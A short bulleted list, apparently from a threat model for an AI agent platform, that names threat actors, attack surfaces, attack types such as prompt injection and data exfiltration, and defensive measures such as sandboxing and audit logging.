- Malicious users
- Compromised AI models
- Rogue tools or plugins
- Insider threats
- Model inference interfaces
- Tool execution runtime
- Memory storage backends
- Configuration and policy injection
- Prompt injection
- Data exfiltration
- Privilege escalation
- Model poisoning
- Unauthorized tool execution
- Strict sandboxing
- Least-privilege access
- Deterministic execution modes
- Audit logging and replay
- Policy enforcement at kernel level